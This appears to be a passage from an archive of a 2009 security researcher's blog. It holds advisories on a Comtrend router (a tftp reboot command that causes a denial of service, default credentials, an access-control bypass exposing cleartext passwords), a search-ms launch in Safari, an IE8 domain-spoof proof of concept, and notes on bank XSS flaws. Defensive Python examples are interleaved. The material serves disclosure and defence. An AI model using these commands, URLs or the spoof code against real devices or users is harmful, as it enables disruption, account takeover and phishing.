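    db = make_db()
    print("vulnerable:", fetch_original_vulnerable(db, PAYLOAD))
    print("intval    :", fetch_original_intval(db, PAYLOAD))
    print("bound     :", fetch_original_param(db, PAYLOAD))
```

Running it shows the UNION row carrying admin's username and password hash from the vulnerable query, and nothing at all from the other two; a legitimate value such as "7" returns the same message row through all three paths.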
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-12103424737677260542009-06-15T09:58:00.007-07:002009-06-15T13:01:13.357-07:00Comtrend HG536+ poligon firmware tftp vuln##########################################<br />Comtrend HG536+ poligon firmware tftp vuln<br />Vendor url: www.comtrend.com<br />Firmware vendor: www.adslzone.net/firmware-adslzone-poligon.html<br />Advisory Url: http://lostmon.blogspot.com/2009/06/<br />comtrend-hg536-poligon-firmware-tftp.html<br />Vendor notified: NO Exploit: see explanation.<br />#########################################<br /><br />##############<br />History<br />##############<br /><br />This is extended research from these vulns =><br /><br />http://lostmon.blogspot.com/2009/04/comtrend-hg536-vulnerabilities.html<br /><br />And =><br /><br />http://www.securityfocus.com/bid/32975<br /><br />The Poligon firmware has all the same flaws.<br /><br />#####################<br />Description by vendor<br />Comtrend<br />#####################<br /><br />The HG536+ is an 802.11g (54Mbps) wireless and wired<br />Local Area Network (WLAN) ADSL router. Four 10/100<br />Base-T Ethernet ports provide wired LAN connectivity<br />with an integrated 802.11g WiFi WLAN Access Point for<br />wireless connectivity.<br /><br />###################<br />Description of the Poligon<br />firmware by adslzone<br />####################<br /><br />Poligon ADSLzone is built from several firmwares from manufacturers<br />and Internet providers (Asus, U.S. Robotics, Comm Net,<br />Broadcom, Deutsche Telekom, Alice Italy, Pirelli (Italy),<br />Bungury (Russia) and Vodafone (Thailand)).<br /><br />################<br />Vulnerabilities<br />################<br /><br />This firmware has a flaw in the tftp<br />service: if a user has enabled LAN access<br />to the tftp server and/or access from the WAN,<br />the router is vulnerable to a DoS<br />condition.<br /><br />In the configuration file we can see which<br />services are enabled on this line =><br /><br />---------------------------------------------------<br />srvCtrlList ftp="lan" http="lan" icmp="lan"<br />snmp="disable" ssh="disable" telnet="lan" tftp="lan"<br />----------------------------------------------------<br /><br />In this case tftp access is enabled from the LAN.<br /><br />OK, create a new HTML file, for example tweaking.html<br />(this file exists in the Poligon firmware, but you can use any other<br />file that is in the /webs folder of your router).<br /><br />Let's try to upload it from my machine to the router's /webs folder:<br /><br />tftp -i 192.168.1.1 PUT c:\tweaking.html /webs<br /><br />The file is apparently uploaded, and the tftp server is configured<br />to reboot the router after the upload finishes. Note that tftp<br />has no authentication at all: anyone who can reach UDP port 69<br />on the router can issue the PUT.<br /><br />Then I ran the same test via WAN access and got<br />the same result: the router reboots...<br /><br />This can cause a DoS to a user, because an attacker<br />can force the victim's router to reset over and over.<br /><br />###############<br />versions<br />###############<br /><br />Comtrend HG536+ router with these firmwares:<br /><br />firmware Comtrend A101-302JAZ-C01_R05<br /><br />firmware A101-302JAZ-C03_R14.A2pB021g.d15h<br /><br />firmware Poligon, Release.0810b_1525 ADSLZONE v.1.10.08.11b (tftp issue)<br /><br />##############<br />Solution<br />#############<br /><br />No solution was available at this time.<br /><br />By default this router is configured to<br />deny access from WAN connections,<br />but this style of attack can still be done if any<br />user is inside the LAN, or if access to the tftp<br />service has been enabled from the WAN.<br /><br />Configure the router to disable tftp and<br />grant access to the device only to trusted users.<br /><br />################# €nd #############<br /><br />Thanks to Brink for testing with me and for<br />his patience when I rebooted his router :P<br />Brinkxd@gmail.com<br />--<br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
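Checking the srvCtrlList line is the quickest way to know whether a router like this one is exposed. The following Python is an added example, not Comtrend or adslzone code: it parses the configuration line quoted above (SAMPLE_CONFIG is constructed from it, with a couple of unrelated lines around it) and flags services that are reachable and, worse, reachable from the WAN. The assumption that any value other than "disable" means enabled, and that a value containing "wan" means Internet-facing, is mine; adjust it to the exact vocabulary of your firmware.

```python
import re

# Constructed from the srvCtrlList line quoted in the advisory, wrapped the same way.
SAMPLE_CONFIG = """\
lanIp 192.168.1.1
srvCtrlList ftp="lan" http="lan" icmp="lan"
snmp="disable" ssh="disable" telnet="lan" tftp="lan"
# end of service control
"""

PAIR_RE = re.compile(r'(\w+)="([^"]*)"')
# A continuation line consists only of key="value" pairs (assumption of this parser).
CONT_RE = re.compile(r'(\s*\w+="[^"]*")+\s*')

# Services that hand an unauthenticated or weakly authenticated peer a way to
# write to the box or reboot it. (Assumption: tftp is the one the advisory proves.)
RISKY = ("tftp", "telnet", "ftp")


def parse_srv_ctrl(config_text):
    """Return {service: scope} from the srvCtrlList entry, joining wrapped lines."""
    lines = config_text.splitlines()
    for i, line in enumerate(lines):
        if line.strip().startswith("srvCtrlList"):
            block = line
            for cont in lines[i + 1:]:
                if cont.strip() and CONT_RE.fullmatch(cont):
                    block += " " + cont
                else:
                    break
            return dict(PAIR_RE.findall(block))
    return {}


def risky_services(services):
    """List (service, scope, severity) for risky services that are not disabled."""
    findings = []
    for name in RISKY:
        scope = services.get(name, "disable").lower()
        if scope == "disable":
            continue
        severity = "critical" if "wan" in scope else "high"
        findings.append((name, scope, severity))
    return findings


if __name__ == "__main__":
    for finding in risky_services(parse_srv_ctrl(SAMPLE_CONFIG)):
        print("%s enabled for %s: %s" % finding)
```

On the advisory's configuration the output is a single high-severity finding for tftp on the LAN (plus telnet and ftp, which are open for the same reason); anything reported as critical is reachable from the Internet and should be disabled before the box goes back online.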
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-53695024849911109812009-06-10T08:06:00.014-07:002009-06-11T07:21:57.216-07:00Caja Granada has patched its web site###################################<br />Caja Granada has patched its web site<br />vendor Url: http://caja.caja-granada.es/<br />###################################<br /><br />The web site of the bank Caja Granada, under one<br />of its several domains, was affected by a<br />series of validation errors of the Cross-site<br />scripting (<a href="http://es.wikipedia.org/wiki/Cross-site_scripting" target="_blank">XSS</a>) and (<a href="http://en.wikipedia.org/wiki/Cross-site_request_forgery" target="_blank">CSRF</a>) kind.<br /><br />These vulnerabilities were discovered and<br />studied by me until the vulnerabilities or attack<br />vectors were identified, in the external part of the site,<br />that is, in the unauthenticated part of the web site.<br /><br />The vulnerabilities were reported to the bank's logical<br />security team and to its customer service department;<br />after an exchange of a few e-mails, the most critical<br />part of these vulnerabilities has been patched, the one<br />that allowed an entire web site to be included in a frame<br />under the bank's main domain.<br /><br /><p align="justify"><a href="http://www.spymac.com/upload/2009/06/10/ZfNTMQPOzb.gif" target="_blank"><img style="WIDTH: 400px; HEIGHT: 300px" src="http://www.spymac.com/upload/2009/06/10/ZfNTMQPOzb.gif" width="400" height="300" border="1"/></a></p><br /><br />Caja Granada is again secure on the reported points.<br />No Caja Granada customer could have been affected, since<br />the communication took place with absolute discretion<br />on both sides.<br /><br />In the case of the site inclusion, besides having been<br />corrected, we are now shown a message warning us to check<br />whether we really reached that URL through the<br />Caja Granada domain.<br /><br /><p align="justify"><a href="http://www.spymac.com/upload/2009/06/10/HTeOSAsMXy.gif" target="_blank"><img style="WIDTH: 400px; HEIGHT: 300px" src="http://www.spymac.com/upload/2009/06/10/HTeOSAsMXy.gif" width="400" height="300" border="1"/></a></p><br /><br />No proof of concept is given, for obvious reasons.<br /><br />References:<br /><br />http://caja.caja-granada.es<br /><br />http://lostmon.blogspot.com/2009/01/la-banca-espaola-ante-el-phishing.html<br /><br />http://lostmon.blogspot.com/2009/02/entidades-bancarias-espanolas-ante-el.html<br /><br /><br /><br />################## €nd ###################<br /><br /><br />Thanks to Estrella for being my light<br />Thanks to FalconDeOro for his support<br />Thanks to Imydes from http://www.imydes.com<br />--<br />Sincerely:<br />Lostmon (lost...@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-88557559947244985432009-06-03T03:24:00.007-07:002009-06-05T00:38:34.002-07:00Caixa Sabadell patches its web domains#######################################<br />Caixa Sabadell patches its web domains<br />vendor: http://www.caixasabadell.es<br />#######################################<br /><br /><br />The Caixa Sabadell web site, under two of its several domains,<br />was affected by a series of validation errors of the<br />Cross-site scripting (XSS) kind.<br /><br />These vulnerabilities were discovered and studied by me<br />until the vulnerabilities or attack vectors were identified, in<br />the external part of the site, that is, in the unauthenticated<br />part of the web site.<br /><br />The vulnerabilities were reported to the bank's logical<br />security team and to its customer service department.<br /><br />These issues have now been resolved, and so<br />Caixa Sabadell is again secure on the reported points.<br /><br />No proof of concept is given, for obvious reasons.<br /><br />References:<br /><br />http://www.caixasabadell.es<br /><br />http://lostmon.blogspot.com/2009/01/la-banca-espaola-ante-el-phishing.html<br /><br />http://lostmon.blogspot.com/2009/02/entidades-bancarias-espanolas-ante-el.html<br /><br /><br /><br />################## €nd ###################<br /><br /><br />Thanks to Estrella for being my light<br />Thanks to FalconDeOro for his support<br />Thanks to Imydes from http://www.imydes.com<br />--<br />Sincerely:<br />Lostmon (lost...@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-25331230392470222972009-05-12T11:15:00.005-07:002009-05-12T12:00:15.590-07:00Safari 4 Automatic explorer.exe launch###############################<br />Safari for Windows automatic command line launch<br />advisory: http://lostmon.blogspot.com/<br />2009/05/safari-4-automatic-explorerexe-launch.html<br />vendor notified: yes<br />###############################<br /><br />###########<br />Description<br />############<br /><br />Safari 4 public beta (528.16) is vulnerable to<br />the automatic launch of a local command line (explorer.exe)<br />from web content.<br /><br />I tested it on Windows Vista and Windows 7 RC.<br /><br />First take a look at =><br /><br />http://msdn.microsoft.com/en-us/library/aa767914(VS.85).aspx#app_reg<br />http://msdn.microsoft.com/en-us/library/aa767914(VS.85).aspx#url_inv<br /><br />The "security alert" in this documentation says:<br /><br />"Applications handling URL protocols must be robust<br />in the face of malicious data.<br />Because handler applications receive data from untrusted<br />sources, the URL and other parameter values passed to<br />the application may contain malicious data attempting to<br />exploit the handling application. For this reason, handling<br />applications that could initiate unwanted actions based on<br />external data must first confirm those actions with the user"<br /><br />Take a look at how to use the search-ms protocol handler:<br /><br />http://msdn.microsoft.com/en-us/library/bb266520.aspx<br /><br />and<br /><br />how to display Windows shell objects from a command line:<br />http://www.codeproject.com/KB/system/ExplorerObjects.aspx<br /><br /><br />With all of this information a user can compose an HTML<br />document that calls the search-ms protocol handler and uses<br />some Explorer objects.<br /><br />########<br />testing<br />########<br /><br />search-ms:query=microsoft&<br />search-ms:query=vacation&subquery=mydepartment.search-ms&<br />search-ms:query=seattle&crumb=kind:pics&<br />search-ms:query=seattle&crumb=folder:C:\MyFolder&<br /><br />If you compose an HTML document with an iframe or a link that<br />contains any of those search-ms URLs, Firefox, Google Chrome and<br />IE8 show a warning (this is correct), but if you click accept<br />they open explorer.exe and execute the search...<br /><br />If you test the same with Safari, this browser opens<br />the iframe or the link directly, without any prompt<br />or any warning.<br /><br />If we look at the implementation of this protocol handler,<br />and at how to show Explorer objects, we can compose<br />a "special" URL that contains Explorer objects in the<br />"location" parameter, and launch an explorer.exe that<br />searches in a chosen place on the victim's machine.<br /><br />For example:<br /><br />search-ms:displayname=Search%20In%20Google.com&crumb=<br />location:%3A%3A{20D04FE0-3AEA-1069-A2D8-08002B30309D}<br />&stackedby=System.ItemTypeText&recurring:true<br /><br />opens explorer.exe; closing the tab from which Explorer<br />was called closes explorer.exe too.<br /><br />search-ms:displayname=Search%20In%20Google.com<br />&crumb=location:D%3A%5C&stackedby=System.ItemTypeText<br />&recurring:true<br /><br />opens Explorer and breaks the search box:<br /><br />search-ms:displayname=%3D[]%20OR%20%3D%20OR%20%3D%20OR%20%3D&location:<br /><br />The displayname parameter can be used to spoof the location and<br />show, for example, google.com (the victim may then<br />think that the browser is searching in google.com).<br /><br />If we put this URL directly in Safari's address bar,<br />the browser says that it cannot open it because<br />it does not know the associated program.<br /><br />But if we pass this URL in an iframe, Safari shows no<br />warning; it executes the URL and searches within<br />the victim's files.<br /><br />If we pass this URL to Firefox, it shows a warning, and<br />if we click allow the search is executed; if we pass<br />the URL in a link or in an iframe the result is the same.<br /><br />With Google Chrome, if we pass the URL to the address bar,<br />Chrome searches Google for it (not affected directly),<br />but if we pass the URL in an iframe or in a link it shows<br />a warning; click allow and the search is executed.<br /><br />IE8 shows a warning, but this particular search is not executed<br />because it is malformed for Explorer; we can compose other<br />ones (they work too).<br /><br />When explorer.exe is launched, the process is called with<br />these parameters; the "injection" executes at command-line level =><br />c:\windows\explorer.exe /separate,/idlist,%1,%L<br /><br />I am running several tests trying to obtain this other command line =><br /><br />c:\windows\explorer.exe /N,%windir%\system32,<br />/select,%windir%\system32\calc.exe<br /><br />but at this moment I cannot pass this command line in an<br />iframe with the search-ms protocol.<br /><br /><br />Can a remote user collect the result of this local search?<br />I do not know any way to do it; but, for example, we can cause a<br />DoS to Explorer by composing an HTML document with three or four<br />iframes that call search-ms, which can be used to slow down the<br />PC or to abuse the search indexer or explorer.exe.<br /><br />A link that only uses the search-ms: protocol, with three<br />or four Explorer windows, can exhaust memory,<br />and in some cases explorer.exe crashes.<br /><br />I exchanged some e-mails with the MSRC (Microsoft) and<br />in the end both they and I concluded that, at this moment,<br />this does not constitute a security vulnerability in IE8,<br />because it shows the warning, and we have not found a<br />vector to attack or to bypass the restrictions of the<br />search-ms implementation and turn it into remote command<br />execution or remote code execution.<br /><br />This is the final response from Microsoft:<br />#######################################<br /><br />We have completed our investigation into this issue<br />and believe there is not a security issue here for<br />Microsoft to address. Our investigation has not shown<br />any method whereby a search-ms URL could either execute<br />arbitrary code or return search results to a third party.<br />Although additional search windows can be generated from<br />multiple iframes on a web page, this is a temporary DoS<br />condition.
We can find no security issue with the search-ms<br />protocol itself. As such, this is not something MSRC would track. <br /><br />Please let me know if you feel we have missed something<br />in our analysis. Otherwise, I will be closing the MSRC <br />case down. I do appreciate you taking the time to report <br />this to us and working with us throughout the investigation.<br />########################################<br /><br />but if we remember wen we call search-ms protocol<br />in a web page it executes this:<br />c:\windows\explorer.exe /separate,/idlist,%1,%L<br /><br />them .. at this moment it isn´t a vulnerability in IE<br />but i think that this issue need to be track ... <br /><br />###############€nd#####################<br /><br />Thnx to estrella to be my ligth<br />Thnx to all Lostmon Team !!<br />Thnx The Microsoft Research Security Center<br />for their support. http://blogs.technet.com/msrc/<br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
</div>
Comtrend HG536+ vulnerabilities (published 2009-04-27)<br />
##########################################<br />
Comtrend HG536+ vulnerabilities<br />
Vendor url: www.comtrend.com<br />
Advisory Url: http://lostmon.blogspot.com/2009/04/comtrend-hg536-vulnerabilities.html<br />
Vendor notify: NO<br />
#########################################<br />
<br />
<h5>These flaws were discovered earlier by Isecauditors,<br />see http://www.securityfocus.com/bid/32975</h5><br />
Sorry for the inconvenience...<br />
#####################<br />
Description by vendor<br />
#####################<br />
<br />
The HG536+ is an 802.11g (54Mbps) wireless and wired Local Area Network (WLAN) ADSL router.<br />
Four 10/100 Base-T Ethernet ports provide wired LAN connectivity with an integrated 802.11g<br />
WiFi WLAN Access Point for wireless connectivity.<br />
<br />
################<br />
Vulnerabilities<br />
################<br />
<br />
By default this device ships with these settings:<br />
<br />
==========================================<br />
- LAN port IP address: 192.168.1.1<br />
- Local administrator account name: admin<br />
- Local administrator account password: admin<br />
- Local non-administrator account name: user<br />
- Local non-administrator account password: user<br />
- Remote WAN access: disabled<br />
- Remote WAN access account name: support<br />
- Remote WAN access account password: support<br />
- NAT: enabled and firewall: disabled<br />
- DHCP server on LAN interface: enabled<br />
- WAN IP address: none<br />
============================================<br />
<br />
All of these flaws exist because access control is based on an ineffective JavaScript<br />
control in the 'menuBcm.js' file, which enables or disables the items shown in menu.html<br />
according to which user is logged in.<br />
<br />
For this reason a minimal user can call directly all the pages that make up the web<br />
interface, bypassing the "pseudo-restrictions" of the access role.<br />
<br />
To exploit all the flaws, the credentials of a minimal account are required.<br />
<br />
Vuln 1 => access control error<br />
<br />
A user who logs in as the non-administrator user, by entering username "user" and password<br />
"user", can only update the firmware, manage SNMP, view some router status and run<br />
diagnostics about ADSL connectivity. This user is apparently "restricted" from taking<br />
some actions.<br />
<br />
In this firmware version the router has an access control error, and a user without<br />
privileges (user/user) can access all functions by making a direct request to the file<br />
or function of interest.<br />
<br />
Example:<br />
<br />
This user has no access to manage the setup of the router,<br />
but by entering http://192.168.1.1/wancfg.cmd<br />
he can configure the WAN settings.<br />
<br />
Download the config =><br />
http://192.168.1.1/backupsettings.html<br />
<br />
View the wireless key =><br />
http://192.168.1.1/wlsecurity.html<br />
<br />
<br />
Vuln 2 => clear text admin password disclosure<br />
<br />
Log in to the router with the user/user account,<br />
open http://192.168.1.1/password.html<br />
and view the source code...<br />
<br />
In the source we find:<br />
<br />
=======================<br />
pwdAdmin = 'admin';<br />
pwdSupport = 'support';<br />
pwdUser = 'user';<br />
=======================<br />
<br />
<br />
###############<br />
versions<br />
###############<br />
<br />
Comtrend HG536+<br />
firmware A101-302JAZ-C03_R14.A2pB021g.d15h<br />
<br />
##############<br />
Solution<br />
##############<br />
<br />
No solution was available at this time.<br />
<br />
By default this router is configured to deny access from WAN connections,<br />
but this kind of attack can be carried out by any user inside the LAN,<br />
or if access from the WAN is enabled.<br />
<br />
Configure the device to deny WAN connections and<br />
grant access to it only to trusted users.<br />
<br />
################# €nd #############<br />
--<br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer">
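The Comtrend advisory above boils down to one design error: the role check lives in the browser (menu items hidden by menuBcm.js) while the server serves any page that is requested directly, and the password page ships the other accounts' passwords in its source. The following is an added example, not the firmware's code, contrasting that model with a server-side check evaluated on every request. The page names come from the advisory; the role policy, the diagnostics page name and the sample account data are constructed assumptions.

```python
"""Server-side authorization for a router's web pages.

Added example for the Comtrend HG536+ advisory; not the firmware's code.
It contrasts the model the advisory describes (menu items hidden by
client-side JavaScript while every page is still served on a direct
request) with a role check evaluated by the server on every request, and
shows a password page that never embeds account passwords in its source.
"""

# Higher rank may do everything a lower rank may do.
ROLE_RANK = {"user": 1, "admin": 2}

# Minimum role required to serve each page (hypothetical policy).
PAGE_POLICY = {
    "/diag.html": "user",             # constructed name: ADSL diagnostics
    "/wancfg.cmd": "admin",           # WAN settings (from the advisory)
    "/backupsettings.html": "admin",  # config download (from the advisory)
    "/wlsecurity.html": "admin",      # wireless key (from the advisory)
    "/password.html": "admin",        # password page (from the advisory)
}

# Constructed sample accounts: name -> password. Not real values.
SAMPLE_ACCOUNTS = {
    "admin": "CONSTRUCTED-admin-secret",
    "support": "CONSTRUCTED-support-secret",
    "user": "CONSTRUCTED-user-secret",
}


def serve_menu_only(role, path):
    """Vulnerable model: the menu hides links, but any direct request is served.

    `role` is accepted only to make visible that the handler never looks at it.
    """
    return 200 if path in PAGE_POLICY else 404


def serve_server_side(role, path):
    """Hardened model: the role is checked on every request.

    Unknown pages and unknown roles are denied rather than served.
    """
    required = PAGE_POLICY.get(path)
    if required is None:
        return 404
    if ROLE_RANK.get(role, 0) < ROLE_RANK[required]:
        return 403
    return 200


def render_password_page(role, accounts):
    """Build the account selector for the password-change page.

    Only account names reach the page; the passwords stay on the server, so
    'view source' on this page discloses nothing (unlike the pwdAdmin /
    pwdSupport / pwdUser literals the advisory found).
    """
    editable = list(accounts) if role == "admin" else [role]
    return "\n".join(f'<option value="{name}">{name}</option>' for name in editable)


if __name__ == "__main__":
    for path in PAGE_POLICY:
        print(f"user -> {path:22s} menu-only: {serve_menu_only('user', path)}"
              f"  server-side: {serve_server_side('user', path)}")
```

With the menu-only model every row prints 200 for the limited user; with the server-side check only the diagnostics page does, which is the behaviour the advisory says the firmware should have had.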
</div>
IE8 beta RC1 res://ieframe.dll/acr_error.htm Spoof (published 2009-03-05)<br />
###########################################<br />
IE8 beta RC1 res://ieframe.dll/acr_error.htm Spoof<br />
Vendor page: www.microsoft.com<br />
Advisory: http://lostmon.blogspot.com/2009/03/ie8-beta-rc1-resieframedllacrerrorhtm.html<br />
vendor notify: yes    exploit available: yes<br />
############################################<br />
<br />
<br />
Internet Explorer 8 has a flaw that allows remote users to spoof the domain name shown<br />
by 'ieframe.dll' when 'acr_error.htm' is loaded through the res: URI handler. A remote<br />
user can compose a bad link that shows a domain name, for example google.com, but when<br />
the link is clicked it goes to another site (spoofing).<br />
<br />
#################<br />
Proof of concept<br />
#################<br />
<br />
<blockquote><html><br />
<head><br />
<script type="text/javascript"><br />
function open_win()<br />
{<br />
window.open("res://ieframe.dll/acr_error.htm#http://www.google.com/,http://Lostmon.blogspot.com","_blank","toolbar=yes, location=no, directories=no, status=no, menubar=yes, scrollbars=no, resizable=no, copyhistory=no");<br />
}<br />
</script><br />
<title>..:[-IE8 res://ieframe.dll/acr_error.htm Domain name Spoof -]:..</title><br />
</head><br />
<br />
<body><br />
<form><br />
<input type="button" value="Open Window" onclick="open_win()"><br />
</form><br />
</body><br />
<br />
</html></blockquote><br />
#######################################<br />
<br />
Thanks to Estrella for being my light<br />
Thanks to all the Lostmon Team.<br />
<br />
--<br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer">
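Both the search-ms advisory and the IE8 res: advisory above come down to a link or frame whose target is not a web URL at all: one hands a search-ms: string to Windows Explorer, the other loads res://ieframe.dll/acr_error.htm with a fragment that carries a displayed URL and the real destination. The scanner below is an added example, not code from either advisory; it walks untrusted HTML and reports every href/src that does not use a web scheme, and for acr_error.htm links it separates the shown host from the real one. The sample HTML is constructed from the URLs the two advisories quote; the allowed-scheme set is an assumption.

```python
"""Flag links and frames whose target would be handed to a protocol handler.

Added example covering the search-ms and res://ieframe.dll advisories; it is
not the browsers' code nor the author's. It reports href/src values with a
non-web scheme and, for acr_error.htm links, the displayed-vs-real host pair.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Schemes a normal page link is allowed to use ("" = relative URL). Assumption.
WEB_SCHEMES = {"", "http", "https", "mailto"}


def classify(tag, url):
    """Return a finding dict for a suspicious URL, or None for a plain web link."""
    parts = urlsplit(url.strip())
    scheme = parts.scheme.lower()
    if scheme in WEB_SCHEMES:
        return None
    finding = {"tag": tag, "scheme": scheme, "url": url}
    # acr_error.htm#<shown URL>,<real URL>: the first is what IE8 displays,
    # the second is where the click goes (from the IE8 advisory).
    if scheme == "res" and "acr_error.htm" in parts.path.lower() and "," in parts.fragment:
        shown, real = parts.fragment.split(",", 1)
        finding["shown_host"] = urlsplit(shown).hostname
        finding["real_host"] = urlsplit(real).hostname
        finding["spoof"] = finding["shown_host"] != finding["real_host"]
    return finding


class LinkScanner(HTMLParser):
    """Collects classify() findings for every href/src attribute in the document."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("href", "src") and value:
                finding = classify(tag, value)
                if finding:
                    self.findings.append(finding)


def scan(html_text):
    """Parse the document and return the list of findings in document order."""
    parser = LinkScanner()
    parser.feed(html_text)
    return parser.findings


# Constructed sample page: two benign references and the two advisories' URLs.
SAMPLE_HTML = """
<a href="http://www.example.com/page">ok</a>
<img src="/images/logo.gif">
<iframe src="search-ms:query=microsoft&"></iframe>
<a href="res://ieframe.dll/acr_error.htm#http://www.google.com/,http://Lostmon.blogspot.com">news</a>
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_HTML):
        print(finding)
```

A content filter or a mail gateway can apply the same rule: anything with a scheme outside the web set is either dropped or shown to the user before it is dispatched, which is exactly the confirmation step the MSDN text quoted in the search-ms advisory asks handler applications for.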
</div>
Spanish banking entities facing phishing II (published 2009-02-21)<br />
#######################################<br />
Spanish banking entities facing phishing II<br />
#######################################<br />
<br />
This article is the second part of this one:<br />
<br />
<a href="http://lostmon.blogspot.com/2009/01/la-banca-espaola-ante-el-phishing.html">Spanish banking facing phishing</a><br />
<br />
After the study carried out on the state of Spanish banking in the face of phishing,<br />
I would like to describe how the relationship went and what happened after that article.<br />
<br />
An attempt was made to notify the affected entities of the problems found on their websites,<br />
through which remote attackers could try to launch phishing attacks on the entities' own websites.<br />
<br />
To general disappointment, only a minority of the affected entities replied or showed interest<br />
in learning about the possible weak points of their websites.<br />
<br />
Nothing was asked of them other than to patch their websites, and they were offered help and<br />
guidance, as well as a report of all the vulnerabilities found, all of it offered without any<br />
profit motive.<br />
<br />
In view of the little interest shown, the most logical thing is to put up a stop sign and reflect<br />
seriously on whether the services they offer us are as secure as they insist on showing us with<br />
seal after seal of quality and guarantee.<br />
<br />
Almost all of them tend to hide behind the excuse that, for lack of time, parts or projects are<br />
put into production that have not yet been well tested or thoroughly checked....<br />
<br />
Shouldn't they, before doing that, test and retest so as not to endanger other parts of the website?<br />
<br />
I am not revealing the vulnerabilities for obvious reasons, although you can see some screenshots<br />
as proof of concept (I have removed the sensitive information from the URLs), and I will say that<br />
among them there is one very serious one that the affected entity should fix as soon as possible,<br />
since it allows an entire website to be included inside a frame on its domain; the others are XSS<br />
and SQL injection holes, as well as some information leakage sufficient to launch a social<br />
engineering attack.<br />
<br />
I am leaving two out, which are the ones that seem willing to patch and deserve the time to do so,<br />
at least for the interest they have shown.<br />
<br />
The affected entities are:<br />
<br />
##############<br />
servicaixa<br />
##############<br />
<br />
http://www.servicaixa.com<br />
<a href="http://usuarios.lycos.es/reyfuss/xss/images/banca/servicaixa.GIF" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/banca/servicaixa.GIF" height="250" width="400"></center></a><br />
<br />
<br />
###########<br />
sa nostra<br />
###########<br />
<br />
www.sanostra.es<br />
<br />
<a href="http://usuarios.lycos.es/reyfuss/xss/images/banca/sanostra.GIF" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/banca/sanostra.GIF" height="250" width="400"></center></a><br />
<br />
###############<br />
caixa sabadell<br />
###############<br />
<br />
http://www.caixasabadell.com<br />
<a href="http://usuarios.lycos.es/reyfuss/xss/images/banca/caixasabadell.GIF" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/banca/caixasabadell.GIF" height="250" width="400"></center></a><br />
<br />
This entity has already fixed its two holes and is secure again at those points.<br />
<br />
##############<br />
caixa manresa<br />
##############<br />
<br />
http://www.caixamanresa.es<br />
<a href="http://usuarios.lycos.es/reyfuss/xss/images/banca/caixaManresa.GIF" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/banca/caixaManresa.GIF" height="250" width="400"></center></a><br />
<br />
###########<br />
caja duero<br />
###########<br />
<br />
https://www.cajaduero.es<br />
<a href="http://usuarios.lycos.es/reyfuss/xss/images/banca/cajaduero.GIF" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/banca/cajaduero.GIF" height="250" width="400"></center></a><br />
<br />
###########<br />
cajasol<br />
###########<br />
<br />
http://www.cajasol.es<br />
<a href="http://usuarios.lycos.es/reyfuss/xss/images/banca/cajasol.GIF" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/banca/cajasol.GIF" height="250" width="400"></center></a><br />
<br />
##############<br />
deutsche-bank<br />
##############<br />
<br />
http://www.deutsche-bank.es<br />
<a href="http://usuarios.lycos.es/reyfuss/xss/images/banca/deuchebank.GIF" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/banca/deuchebank.GIF" height="250" width="400"></center></a><br />
<br />
####################<br />
kutxa.net<br />
####################<br />
<br />
http://www.kutxa.net<br />
<a href="http://usuarios.lycos.es/reyfuss/xss/images/banca/kutxa.GIF" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/banca/kutxa.GIF" height="250" width="400"></center></a><br />
<br />
They were notified of an XSS hole, specifically a persistent XSS,<br />
and it has already been patched.<br />
<br />
###########<br />
Banesto<br />
###########<br />
<br />
http://www.banesto.es<br />
